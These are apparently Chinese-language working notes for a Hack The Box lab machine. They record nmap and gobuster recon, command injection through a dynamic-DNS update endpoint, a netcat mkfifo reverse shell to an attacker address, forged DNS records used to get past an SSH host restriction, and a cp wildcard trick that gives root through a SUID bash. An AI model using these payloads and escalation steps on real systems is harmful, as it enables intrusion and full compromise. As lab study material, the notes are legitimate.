nmap 10.129.163.210 -sV -sC -Pn > nmap.txt
nmap 10.129.163.210 -p- > nmapall.txt
gobuster dir  -u http://dnsalias.htb/ -w /usr/share/dirb/wordlists/common.txt -x txt,php > gobuster.txt
gobuster dir  -u http://dynamicdns.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php > gobustermedi.txt
gobuster dir  -u http://dynamicdns.htb/nic -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php > gobustermedinic.txt


dnsalias.htb,dynamicdns.htb,no-ip.htb
Username: dynadns
Password: sndanyd
dns@dyna.htb
dynadns:sndanyd

dig axfr @10.129.163.210  dnsalias.htb
dig axfr @10.129.163.210  dynamicdns.htb
dig axfr @10.129.163.210  no-ip.htb


1.nmap掃描後發現端口 53,80
2.網頁上發現域名及帳號密碼
3.gobuster掃描路徑可以發現nic以及nic/update
4.訪問nic/update後返回badauth,可使用以下方式請求
curl -u dynadns:sndanyd
burp添加 Authorization: Basic ZHluYWRuczpzbmRhbnlk
5.測試驗證成功可以正常請求,返回nochg 10.10.14.45
6.根據nochg上網搜索可以找到no-ip的請求API文檔如下
GET /nic/update?hostname=a01.dnsalias.htb&myip=10.129.163.210 HTTP/1.1
Host: dynupdate.no-ip.com
Authorization: Basic base64-encoded-auth-string
User-Agent: Company DeviceName-Model/FirmwareVersionNumber maintainer-contact@example.com
7.替換請求地址為a01.dnsalias.htb可以成功更新dns
8.在解析地址前測試comand-Injectt
9.發現;id;"可以取得remote code execution
10.將以下做urlencode加入到裡面,取得reverse shell(ip要to hex)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 168431149 4444 >/tmp/f
11.查看bindmgr目錄下support-case-C62796521可以看到私鑰
12.發現指定只允許from="*.infra.dyna.htb"  域名連入
/home/bindmgr/.ssh/authorized_keys
13.透過以下指令添加正解及反解IP地址
www-data@dynstr:/home/bindmgr$ nsupdate -k /etc/bind/infra.key
> update add timmy.infra.dyna.htb. 86400 A 10.10.14.45
>
> update add 45.14.10.10.in-addr.arpa. 300 PTR timmy.infra.dyna.htb.
> send
14.ssh登入bindmgr用戶
ssh bindmgr@dnsalias.htb -i id_rsa
15.sudo -l 查看有root執行以下腳本權限
/usr/local/bin/bindmgr.sh
16.查看腳本內容有複製指令,複製.version檔案,查找.version檔案
find / -name .version
cp .version * /etc/bind/named.bindmgr/
17. cp指令的--preserve=mode的模式可以將檔案保留原本的狀態
18. 將bash複製過來 並添加suid權限 chmod +s
19. 創建檔案名稱為--preserve=mode 的檔案,以至於腳本在執行cp .version *的時候 會將檔案名稱當成變數執行
20. sudo的root權限複製後的bash有root用戶的執行權限
bash -p


GET /nic/update?hostname=a01.dnsalias.htb&myip=10.129.163.210 HTTP/1.1
GET /nic/update?hostname=;sleep 5;a01.dnsalias.htb&myip=10.129.163.210 HTTP/1.1
GET /nic/update?hostname=;ping 10.10.14.45;a01.dnsalias.htb&myip=10.129.163.210 HTTP/1.1


/home/bindmgr/support-case-C62796521/strace-C62796521.txt
/home/bindmgr/support-case-C62796521/C62796521-debugging.script